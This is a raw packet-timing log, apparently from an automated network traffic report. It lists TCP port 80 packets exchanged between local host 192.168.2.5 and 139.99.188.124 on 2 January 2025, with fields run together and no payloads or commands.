                                                          Jan 2, 2025 10:54:57.935662031 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935671091 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935672998 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935681105 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935691118 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935692072 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935700893 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935712099 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.935713053 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935736895 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.935744047 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936088085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936141968 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936177969 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936189890 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936199903 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936209917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936219931 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936228037 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936232090 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936249018 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936274052 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936299086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936311960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936321020 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936331034 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936340094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936345100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936353922 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936358929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936364889 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936369896 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936403990 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936453104 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.936976910 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936989069 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.936997890 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937009096 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937012911 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937017918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937021971 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937028885 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937046051 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937055111 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937057018 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937066078 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937071085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937093973 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937093973 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937107086 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937108040 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937117100 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937129021 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937135935 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937140942 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937151909 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937164068 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937166929 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937180042 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:57.937186003 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.937222958 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:57.941891909 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046011925 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046049118 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046060085 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046071053 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046082020 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046092033 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046093941 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046109915 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046139956 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046181917 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046194077 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046205044 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046216011 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046226978 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046238899 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046247959 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046273947 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046365023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046462059 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046473026 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046483994 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046494961 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046497107 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046508074 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046519995 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046540976 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046731949 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046751022 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046761036 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046772957 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046787977 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046791077 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046801090 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046813011 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046813965 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046824932 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046840906 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046843052 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046854973 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046866894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046869993 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046880007 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.046886921 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.046914101 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047208071 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047219038 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047229052 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047240019 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047251940 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047261953 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047274113 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047274113 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047307968 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047494888 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047506094 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047518015 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047528982 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047538042 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047552109 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047641039 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047652960 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047663927 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047674894 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047683954 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047693014 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047703981 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047705889 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047739029 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047755957 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047769070 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047780037 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047791004 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047800064 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047804117 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047808886 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047816992 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047828913 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047841072 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047854900 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.047877073 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.047898054 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048320055 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048331976 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048345089 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048356056 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048367023 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048372984 CET4970480192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:58.048378944 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048394918 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:58.048407078 CET8049704139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965145111 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965156078 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965164900 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965177059 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965190887 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965205908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965279102 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965291023 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965302944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.965338945 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:59.965410948 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:54:59.970227003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.970252991 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.970264912 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:54:59.970330000 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.026989937 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.173330069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173348904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173363924 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173379898 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173408985 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.173429966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173454046 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.173710108 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173749924 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.173896074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173918009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173930883 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.173955917 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.173964977 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.174009085 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.174432993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.174479961 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.174493074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.174525023 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.174562931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.174576044 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.174608946 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.175358057 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.175400972 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.175410986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.175425053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.175461054 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.175545931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.175559998 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.175596952 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.176348925 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.176367998 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.176381111 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.176412106 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.223037004 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.382193089 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382209063 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382227898 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382237911 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382251024 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382261992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382266045 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.382292032 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.382307053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382318974 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382318974 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.382363081 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.382831097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382874012 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382885933 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382906914 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.382936001 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.382978916 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.383347034 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.383357048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.383368015 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.383397102 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.383492947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.383506060 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.383517027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.383532047 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.383563042 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.383953094 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384006023 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384017944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384046078 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.384119034 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384130955 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384141922 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384152889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384159088 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.384185076 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.384821892 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384846926 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384856939 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384867907 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.384893894 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.384984970 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.384995937 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385005951 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385018110 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385030985 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.385056019 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.385803938 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385816097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385827065 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385853052 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.385854959 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385865927 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385875940 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385886908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.385896921 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.385951996 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.386715889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.386732101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.386744022 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.386753082 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.386755943 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.386792898 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.469209909 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.519841909 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.590900898 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.590939045 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.590955019 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.590970039 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.590976000 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.590982914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.590989113 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591193914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591206074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591217995 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591289043 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591309071 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591310024 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591310024 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591346979 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591357946 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591413021 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591589928 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591629028 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591638088 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591641903 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591679096 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591710091 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591810942 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591821909 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591834068 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591845989 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591852903 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591866970 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.591947079 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591959000 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.591994047 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.592336893 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592356920 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592369080 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592377901 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.592407942 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.592462063 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592542887 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592554092 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592566013 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592577934 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592582941 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.592600107 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.592664957 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592705011 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.592732906 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592745066 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592756033 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.592787027 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.593353033 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593364000 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593375921 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593394995 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.593421936 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593426943 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.593435049 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593446016 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593456984 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593473911 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.593498945 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.593617916 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593631029 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593642950 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593653917 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593666077 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.593673944 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.593714952 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.594191074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:00.594237089 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:00.594255924 CET8049705139.99.188.124192.168.2.5
